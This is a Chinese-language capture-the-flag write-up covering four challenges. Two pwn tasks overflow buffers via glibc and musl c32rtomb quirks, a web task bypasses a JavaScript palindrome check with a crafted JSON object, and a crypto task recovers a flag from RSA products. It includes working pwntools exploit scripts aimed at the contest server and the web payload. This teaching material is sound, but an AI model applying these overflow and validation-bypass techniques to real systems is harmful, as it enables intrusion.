[Pwn beginner-easy] converter (78 solves, 112pts) 此程序将用户输入的十六进制字符串以utf-32编码转换成对应的Unicode字符串,目标是泄漏flag_buffer。
1 2 3 4 5 #define MAX_FLAG_CHARS 31 char utf32_hexstr[3 ][MAX_FLAG_CHARS * 8 + 1 ];char utf8_bin[MAX_FLAG_CHARS * 4 + 1 ];char flag_buffer[MAX_FLAG_CHARS + 1 ];
可以观察到flag所在的区域正好紧挨在Unicode字符串utf8_bin的下方,而程序会在用户输入完成后开始转化并将结果utf8_bin打印出来
1 2 3 4 5 6 7 ... fgets(utf32_hexstr[q], MAX_FLAG_CHARS * 8 + 1 , stdin ); ... c32rtomb(utf8_ptr, wc, &ps); ... printf ("Score %d/3. " , correct);...
首先尝试通过栈溢出来将utf8_bin到flag_buffer中间的区域塞满非零字节从而使flag跟着被打印出来,然而每次可以输入的十六进制字符串长度被限制在 ,每八个字符可被转化成一个Unicode字符,通常来说在utf8编码下每个字符的长度不会超过4字节,也就是说字符数量每字符长度都拉满的情况下只能写入 个字节,而utf8_bin距离flag_buffer 个字节且后四个摸不到的字节中必有一个零,因此常规的溢出没啥作用。
通过查阅文档发现glibc中的c32rtomb最多能转化6个字节的utf8字符,然而没有提及是哪些字符,笔者自己实验后发现从0x04000000到并包括0x7fffffff的所有输入值都会被转化成6个字节,虽然不知道为什么但是 的溢出上限长度足够了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 #include <locale.h> #include <stdio.h> #include <stdlib.h> #include <uchar.h> int main () { char * locale = setlocale(LC_CTYPE, "C.utf8" ); char32_t in; printf ("utf-32 hexstring: " ); scanf ("%x" , &in); mbstate_t ps = {0 }; char out[32 ]; size_t nbytes = c32rtomb(out, in, &ps); printf ("c32rtomb returns %d\n" , nbytes); printf ("resulting value: " ); for (int i = 0 ; i < nbytes; ++i) { printf ("%hhx" , out[i]); } printf ("\n" ); return 0 ; }
Out:
1 2 3 utf-32 hexstring: 0x11451466 c32rtomb returns 6 resulting value: fc91919191a6
已知需要在utf8_bin塞入 个非零字节,每个11451466可被转化成6个非零字符写入utf8_bin,那么可以 组,虽然多溢出了四字节但由于flag前几位是固定的所以没有影响。以下是解题脚本
1 2 3 4 5 from pwn import *cha = remote("34.146.195.242" , 40002 ) cha.send(b"11451466" * 22 + b"\n" * 3 ) print (cha.recvallS())
[Pwn beginner-easy] converter2 (26 solves, 91pts) 程序源码与上一个一致不过由于这次链接了musl而不是glibc所以现在c32rtomb不再会返回4以上的值了。
Out:
1 2 linux-vdso.so.1 (0x00007fff64d45000) libc.musl-x86_64.so.1 => not found
观察到该程序将c32rtomb的返回值作为偏差来控制写入utf8_bin的位置
1 2 3 4 5 ... char * utf8_ptr = utf8_bin;... utf8_ptr += c32rtomb(utf8_ptr, wc, &ps); ...
阅读文档发现c32rtomb遇到无效的utf32值比如wc = 0xffffffff时会返回-1,可以利用这点从utf8_bin反向溢出到utf32_hexstr[2]。如果能够在utf32_hexstr[2]塞满32组8位的hexstring并且每组都能被转化成4字节的非零字符,那么在第三次循环时utf8_bin将会被32个非零字符填满,溢出到flag_buffer从而达成目的。
由于反向溢出只能影响到utf32_hexstr[2],第三次输入时可以拉满转化长度,输入31组能被转化成4字节非零字符的hexstring,在第一二次输入时通过反向溢出填补utf32_hexstr[2][31*8+1 : 31*8+8]这段空白。通过gdb计算出utf32_hexstr[2]距离utf8_bin270字节
1 2 p (int)utf8_bin - (int)utf32_hexstr[2] Out: 270
这意味着可以先将utf8_ptr退至utf8_bin - (270 - 31 * 8 = 22)然后再写入一组合适的hexstring比如"00010000" => U-f0908080,以下为解题脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 from pwn import *r = remote("34.146.195.242" , 40004 ) utf8_4Bnz_hexstring = b"00010000" reverse_overflow_payload = b"ffffffff" * 22 for i in utf8_4Bnz_hexstring: reverse_overflow_payload += f"000000{i:02x} " .encode() reverse_overflow_payload += b"\0" r.sendline(reverse_overflow_payload) r.sendline(b"" ) r.sendline(utf8_4Bnz_hexstring * 31 ) print (r.recvallS())
[Web beginner-easy] Upside-down cake (127 solves, 100pts) 观察到网站接受一个text输入并再点击发送后将json数据{"palindrome": <input>}POST到根目录并且显示返回内容 后端脚本取出palindrome的值并进行校验,如果通过则打印出flag。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 const {palindrome} = await c.req .json ();const error = validatePalindrome (palindrome);... const validatePalindrome = (string ) => { if (string.length < 1000 ) { return 'too short' ; } for (const i of Array (string.length ).keys ()) { const original = string[i]; const reverse = string[string.length - i - 1 ]; if (original !== reverse || typeof original !== 'string' ) { return 'not palindrome' ; } } return null ; }
看起来需要输入长度不小于1000的回文才能通过校验,然而nginx设置将请求体的大小限制在了100字节,与之前的长度下限相矛盾,长回文在被程序处理前就被nginx过滤掉了。
首先是通过string.length < 1000 == false这个条件。虽然叫做string但是其类型是可以不是string(通过输入其它的json数据结构)。如果该类没有length属性则会返回undefined,而undefined和1000在JS中无法进行比较从而通过该条件。
由于string.length == undefined,通过之后的for语句实则要满足string[undefined] === string[undefined - undefined - 1]以及typeof string[0] === 'string'两个条件。第一个条件可以简化为string["0"] === string["NaN"],传入一个形式为{ "0": <val>, "NaN": <val> }的json对象即可满足此条件。为了满足第二个条件,让<val>为任意string即可。
以下为样本载荷:
1 2 3 4 5 6 7 { "palindrome" : { "0" : "a" , "NaN" : "a" } }
前端脚本会对输入进行JSON字符串化,直接通过BS修改请求体。
[Crypto easy] Unique Flag (82 solves, 109pts) 程序生成一对质数 ,公开 以及对于每个i, 。由于flag的前几位已给出,已知flag[i]的情况下可以遍历所有可能的flag[i+1]取值并计算出 看是否包含在clues里从而一字节一字节地找出flag。以下为解题脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import stringN = 23270433480920204754247611545325351123344837487480637119344134402239723224072753511766733288907047277110318616688410345451695008290697208699431350412549980332693080979894504737640802849242656337537061128034361792156302502329044951868719492095983428863678764573927362740207756141512536958600798465368672826288270218390845725069636496528488276905161318078890887808033722334376853632300178257589009018165644740844747444214979597702959381078126401914809713991087656801656368079319383579542103855944156160231935875884314630699684359910296730669798237991501134339113682532446997472722560474195749179320370386661938616345489 e = 65537 clues = [790128007826920672966041424911766354167695121053219604283198146207007061791691778597663178563455647947105718896263099495348666331968821896627253287975936857535926164644548223394731131868459847861503995994130787209417795249554290922334587840664276128893082715626698208421033163870050616673531495044580102830036983208043090136212931697438690030675611301000171270559392107484305007589373493054650247495594665847524590737367285135216109196557363472975056201832374767680569696302197844301099024043070258479146726214414688459938129079248125143388403636784068208501745074616490491553776387248926153964494371491351883633209 , 2603711767185838325352475153597847161854130118046369285623915043550612314176250745686994158628404520769025735077328213489305045750703593138538988340789187229888984902266067604215108157628606721779126603704209046389682027226116051092595210765409544706918465385789940134172311788347486915924020739666375005469879097995622537311532236494537245411805276338873499191960938465585934543775755531517716535416304391622644348521922876999587501073379321712481689748053619310595304248483018790236975241904276396525088600521271478581198340688684196813199138458166434400373640927130152301112142288723416868406008752554068971897796 , 3555341764263168489859556591176672830061219988177503466050405264336799992429135972104282899942353497557907652603350792489036502274605405291660887915416806360972250779650137925049172948193768071600510818240408613776868308398496542674893829543607137246662897358746317583492470427929271497748068342690213991707491115445413140859740482959186024227616377454531805749180736700863648663258910520198205760375727899867937645622163083304815955402598214976712655286175624671893539673068172120613290880503614440004957010458255469774287344198988168780496350286219383906192401923310489444670837618343011413316177831554304813263293 , 4392082234365429459669635522490994995545586622061892472817657701654688511628534821883962531710455275948798581412337865098670688087280709878221953558349740960329160083052847343991585094759562763366071177122979453158141777809615757029472963694552128931278267696610442930805576661385112057944278069707887638239490706210686333113376066401571156753733092557168107224196049486567238631166786676598900544251407195743615657256591953956049341610070209608544320990612354876845027617374094455067062785749092329211594227845595088640923695318792943759161256049917608399044564463672780212345061033003580514031008070984006394521668 , 6978684590718573243656949612105542758488203443423350685382013479128441571089892176317290844763856663774755922991003851926082052833399193817638062111399819008457173066656968710933915780345439852889885256407111306528134824030362697685736295137459712033151836378581847902384300946884645175079050691372299609133912373238921511680524246835804911263766704418407215767692780171673688161098855454535667470100406268512578658298590762764201801122154299700156455886608231139966939989436753650901587246230468663005258431711603830727021655440551309738459469083116564621458459773745615809415945961545341435040532110184451588706909 , 7730262380985917599887572033422177147289651970502093448402835145164830024426315228806715285722659089566236129886746480764786215693984588815504124791891393731400575988135841499609611797069840377647924075117377822033352586269608104804125510707845643611710455554838427560803831147423159767827522768368918988345993436576494036323665588754259053163989171434047082195256858849152960407740290442654588260794482691958589991068313525613320625439489177141737508702594419202694397478381467839720929129426927668998377854144326405841432095191488744613115154408572282654135532074279295245338650730047025690759623846022642571071963 , 7870428672617888994422906853248211446366754259733482277745650556132131582761503165723404791505714110195629648744360328326420176714096715656418558504951970022788814322102278336415722851826552839236483969562821649541794780657722003849928232610560989749085154296910943580468121448389230575504988958640111467569744601441342152829070870718010034108398733578934054919041551400855436743799387390257957855545880360755020395022783083503166714335601095744185285348725860445725936407700491229265197561539811624147428412389726767719262845468067268220408467424614068704646047656505819137603600314223155281334867541677294657269390 , 8609510284694803043189705088389821843021038300248628370429317978814889304430328856895995414830838739620301124621301721537775180909783646308710312015748757692570074444146048063288330338241388649181127306992151615819806150752330593447168414624657327459419994792062262566992856822874586796213398413460564073159223988672183437164224830058703931407420751347450506434382840960774130788709586835237024062653074786060686562890430445063234694495435768852328222652802008741192860317680389695015771978657721235243624844185665810736779862719888645610567314465422364407861744887985325045151347091814327252867102598023702123634893 , 8764012548720665713701201793155399309870111965369993371803350036539422185650799931107265721471961540862241262644925810817557287987388612113771424453413029690339343352048592343900357225140896471551985699215620154773850213962677651930062137448251705285861554850231313763242085813951196025573454108680549038776926779092562595635561865377427363791539907677647388233742883434894879173415977599370552750513325217529346778748301898211759441267178121774471269812805873578379664777277726959180923972945741326150250571072096537087980515856259481465906892196132539685345329249252030441836333228304113901123751209313594774048411 , 9008821235404534774894891840865644757418002303365121156019461336283705824480673407281784353738233629927976889096625448460073180574899056351401937861566897823469165990311234532903677780258240301012377511917098868850017485389860900161403497054524629055763134706771541438200372479388084747248076874591357294592908214804614821614134453271058041821309928429492064920317496131336615880002176651354627658576705156794615097981712459554762647700173303841240037417204812844860127520500295842333216976016883771600927798062138428278165410002807841897458765380987909422855298376904935944755071636375020175879303691494691648729571 , 10474911617314344093035296274381234749101583500527437860041431188313938156453438490783669910408601907840231565111467423937905944246300919566807077410926355571241589514754269643137702018163430659263615177391720920777071669679112457463342818217687533446232740783283032619985290522536451057260694049911207086850829161304525815898322999460249349418001236987856485233784175562194872850068860587367749350367692115642230663276488474831786206392289391683584796316038243477608620299442818925558267755743944966965590254288900990166554824598295411812423812057962439493264058570961162833692763593404011287652460274292011178704229 , 13110381638342217700044116835482318354178640599253721255902105118218292921908590875402841920977595295587154969905468217393514029780192254567805167189561981288346541104187097786158686610182752582262736216900889630694589441983532956902475092397149348354578876977278601897135958677041840489787116994835677415918526784950587842308692695028053266428000179056540851210672916239382320991277325978720399398297894385691874713065477018336173537483516990191924630941831467023912809007439219185416637094870113459693399267881245563091987656247602891135995257754370121186475874895953059792350690971513600960862888017703690554083459 , 13722721572470236588898440206865856389152421592146331372623620761105236258642769428613680530235913336412231001256536483370539801648315256149288975606335360634006014491805081550253603688595254959670129531815820738880819515467443628589419885739357776607879281030305390788462268201177519696379582421075205825223506882790846127395851423387355250518925599458496527319759716961190269475043488198823985171705163502605280956855529982181144980535693738091067309543085139412462069952512044802852746114286283887473219768202644823684600027741551806766726373880658547387314450097217066672915328591025976805608015523890515132426387 , 13907378143102130732902591528175452184668250175669078564922722729277532332899307298492183863825002170085267037120966710137296520632659066245811450863381591820314104559304716576579947768421047268607544985860210956387427521210211129755935598531328869037393608408989674670981088938567613781468335811260237492104595950519517518617578677677787025453461327336960623845610621752404588399599991001699803056576669100638249157172825774364065063815561453951010729993716989597143669677725856650954155213710311820417545885775510044222220541796461890558861039133971629201524057880779170401640703503019641132712790726669921828415791 , 14120400860385637396632607286135661793958438285062218101343811442329217898129411032002000350977425825996409346097620544352258144601308497322065150782257038383914436998782920142187156177557396917159637452504378331382141301919552487290646033095326670250741650299062291668092793457098216953317991446828793222200503107261585592188754090447817955186450059917734158228634856449513892854663100410202968587025379391901260869884847048181290904241170031050049608323224619595992013998760176044527640260560226425674718522654115796289752023951046001416701610705547940854507383323162061543349749057955527154808438878655873381924405 , 14698896348088063156187270997421588677714399061222880874144618906068645039117367567961854550911710929776929577319055009436987940195644271595440197688498312761277731697978188128431643248470794438585436719216257105191878641049129049923301277529851691883566500423292922218796681106904405477311127758973402766359242062810538614875409810216565025132923823792242500786728482925652318681058145996956719422754840265487588886384210435421642534141346623264992306879009731648539475819770296162993354959588928869246795665015356541113141789547198151388517967205114998707046242427529782450631008568205068970921337432050960660682459 , 15029884228277986489199399805546744756384194842114602643592034471387136929994797445880809477875738231285145593249223445053535965293809750894912475666388265290853063554307747052471064827789230626431100261538591961826419047326217130106954938564102444946805966835435441345928820303084749906070834370292328693504130454703539813471516484793230944669747561760610824827040233316834137947013336066206964971490936063361717836670055655255008278013748443661849914080655007167036195301285165244039723352500939219835986599194370637835048745016392523067465483063368927290961796554522196264881536578834490630583213917304029865939161 , 15309200221723806616467815527508949449508016308667619503475045946652621652525992305168651560887284176353924931956269939787077811973514566176608684620809151397625885719537402839920369797647002257990605085738377504988859240254084164590957509486682488178961349129559926308115898888408809018423909717677181884526722126502322318455704911203649111381107113783748969172970323298774692322646329004904087523994990271905442581272126396627211570936941571392711592683960657204560162191971440131508850959242922017207256661353383453193118931908674343390887637124979355811285785638033429254835197971636826274879249886842048918432736 , 15724182462935088662707915446655107878278152894209881300967803307334781347515606304746531472463196270125945780931765849147216669235630418637875694444778675771594247113061143844136107527843426140240070502431201960657331892635213118991405460668666027672294906783791441223090507736721265283630015340939375871798311963795515181453223204337362840111547002251197009848653679561190486710064616795228154486847718903419257804283649208020835219877286500226549440463845774258811597945314325403472598511132833259835975605936073505765246811661546643859844350550681749257518136665405784760339373876106842193544962035364141936283753 , 16010598613006269242394494415481073404802885743759056303920374396389364406805008152009154054902831052653758678196829556029416363334310779301534650601102392985616360749664385284718557734612612334579643566581651102242306222193227111260448228193714693240481130347390382116855512299873569881326939972343314570039547897580924071328599722614389921295511670529095683738107704146361532800780429539031159556496976109863114080778133301779747597407525649360836980458868113543694436862963884485475906909931191611405995601484367864575876650055986787526037062685039522257827670426684466191523819658566267710796063797508503673575508 , 16176225157815061780398885654620420828395273758161309313595904684794782916031471005382323856662285262373051339479066795020066992972796748770489374700029745240899106774349950323621974876991346899532267757945372794675963763211677154442477490480764334758589065403101041835380412036155680032278713692380636751799800174173937468277604554776759076686957635653867348211328058462563934841255845438021673179325752005903202195307236777237380608739528664802974483747876242106584283139484518385093456386588108230286642702223901374448669968747735244954159162896226605024555185352576619896951345620018917148886974802087005061112135 , 16681188269653223654724315030136682210774552752554458086958468278548783168739866695726975896035811383412108751120213372631892032120642218357242947180926422406518062384144340315186804028028673285952917556435047990619394575021747680589947318197008430952647870055239411272055715760414079469566525762018667573302151696340104245475784099738670745323261117058044792751584716381734074389247651104965039208100878784761184187575420884985536037251587193757974760803271209026578181938823090178086385927565035063194430696540320842560908821318551920518079959829776767797371769064772564881430027427764161144068312324251665729488780 , 17829658117323428808747868598742075440062137591346852189083905589271168845051505272630777599191830286419880652433509964145788364929611644511812576526573426916933568982874857304389571078641719134887390902234897633109911630620064342448365833021501305097046535685687516423128015236731938861706627775842928316810722656485753731575710818024516292222339926273882441860157758675960292785969030577768637311050941129992914285935037973635612973287046435622821551354639344767359753011162290622995439092970304336429989082391680592785895499607898534896211918901223135266662562647266007027360588113757029416715494934165222739616683 , 18142530606909716062376251786389643324197492525662369626779351589827519710596398063341881492070698478957535529402981903035193439593816123316087575219925977686245766113691521350584328679759502382807285523704968935762596078425008178057360086647386696939735982650179504583840710564525731340265745482252714541820058727354731450644763797071558334414897585733667272516453556559972684675125516239673811780523512745567106915629379361310179451294037943334450423100411431081620714967277818090200519889910181746783471882899674667241036338987708997780333893361059800622713833148966642131905197255377905810743498001951198125311059 , 18916874915493297936079891268802075451235734846035427583955430843324283662366324633202233385782932817340850020378986785716061936989209245162032573305936283861299211919092036584752926046345006676182392365941514696661367329055550272171753927543111392356350737216020653037731493630053105987250335352958368913760588484193482490045930904427197949983588313643868410274754829287237363788001109161904345279546393663787324578514084534019735002594130069819170331383328434044289905874038021158845855747798172165049208337121421852611456896877370705022828767867961460247191792131749388018583310316369606660652603473617620362220776 , 19761531445789644550941649188821673088534370105097262343329866705687995865103813168376859916409080934942621503804632853819460640556129955518535485874638416201423297931706690054251711146751875933841075798086049232897482741510517534219163312537149829346821694199026849981873391746409094894635786418504655918594084378562506966684113615145069297495931332254115518216812302704944162971621215874347240778158691664956918543903100361085291794226778736356304744575442579466683011144983985184446648189753472950753969800901371318514176099102941183927711143295688852105189853285767981704534129685617787251540530767915253022947490 , 20256094547551427361159536964089120192470579547856867798123148497076148597338094007239708853868154430044018965669548800520357708625488500840886524107263842898564620995651088843299156623903379275911887021467406220229809304913979273339544306605180744927202065302617395980949445708701034751035277692178613703611237789111970396029694552402613307432231659723290421165555788483472386785358943811922285121036435102796254087074468046006584551405865525781432291674627713381806461231003764884384009047079053403228562795215671383412031358781402019097452515349062662042796744413040430120541108838183559554461277378419187930920413 , 20363523683403754850477941996268145873307803894978921710228462628146999736940222671129222862265160379946415684464747917659662321205107403115837157035374067466188228334375906081151411079001619437896818940656122691708169785711806055272700179185892964477917806030204206763229340531579796772278526520943763997401381029845705999036446407497831084737277684996161128395539244139220962069262836778956401801008041186706885436332324336681638085145485728737526432916392575653655187967807139187810035548902309557063161478464221501395056289134752409225031789805569864167180786090815982754846720197089740299363472750121282729340973 , 20814912434079654358712994986655938285672355659172554521972448981339195273278087029468453535698010595236459533086499060463317723686547000241667857244712653564557545738168820338242942485233926997951781862259839493112100996378583435254659260667047548564231904421776634552680502559175487802626042304303449745827230709927179704869112666087937034760280611168221409540432787302943151703739428105219869226885922197133645265907625314478690899327851652074282189138427005746519010639537824886929608878348016360424645895051778822009871610495121610883214100573360743476671172464995366677557757239376079084722813893096016326823606 , 20978978782083985514808414763592752188297832781732994978611517153950737776001188808668923478821417090172961435355822072526474663371493271175072308071960227368747274906534977118068778902399152185246696702689800010100729290250592141361416806610123159371068751278126481137723149743960233299432386251076215253444110113219693470037719585135531616598037376091905011497168565184564212550608338331996940342482386974738408168008861574665395721197042150006344988032346900944468633093984681022454475106597004968263850271320396630355903399323458669065574677651201990075334529713587085951400864385000308137999968746200082025015416 , 21510393992991434219771555281382073811886457282216421285690979093137458508475954568419056773565332788894486275426908163637126421408657102596322971185031241956913463507854888295227362444328359266706872420059719619657069662925599952624262906407162386789979523361641558714567193670965811155805593371330497659154542639258412356476199441487088405118103359273682288473187622391831093531374603531951020860755898239699034003278466710154923269181470911166256665818879112416320538492976301262952831443514831107346725637206419870968005748691921100981160236843650083592044728031025798498262451919405184577923803192873012465402408 , 21702370286383142896382980896421981414971906140748132749535149467159561579953330771029906461700411301795811236217402115596536451372996903939804016345835732303546870765245612262653631530944318690150045446899350265189274003884240988723566380751519278171721537440720211256644999794264781281823566708722358903968738834874217357352233640572984862487562571610283183746852625175244503706166323292070046358158579157876780137070957640130723554973407811810584917266738218587446647624045843454142231125439581659799761005303756629310091897520981148547565077534090671712715361212723249781422387730181374938558849132220687101010195 ] def compute_clue (x, y ): return pow (x*y, e, N) flag = b'TSGCTF{' for i in range (len (flag)-1 ): clues.remove(compute_clue(flag[i],flag[i+1 ])) for j in range (len (flag)-1 , 32 ): possible_next = [] for c in string.printable: c = ord (c) if compute_clue(flag[j], c) in clues: possible_next.append(c) if len (possible_next) == 1 : next_byte = possible_next[0 ] flag += next_byte.to_bytes(1 ) clues.remove(compute_clue(flag[j],next_byte)) elif len (possible_next) > 1 : print ("Possible next: " + str ([chr (v) for v in possible_next])) choice = int (input ("Your choice: " )) next_byte = possible_next[choice - 1 ] flag += next_byte.to_bytes(1 ) clues.remove(compute_clue(flag[j],next_byte)) else : print ("Error! One of the choices wrong!" ) break print ("Current flag state: " + flag.decode())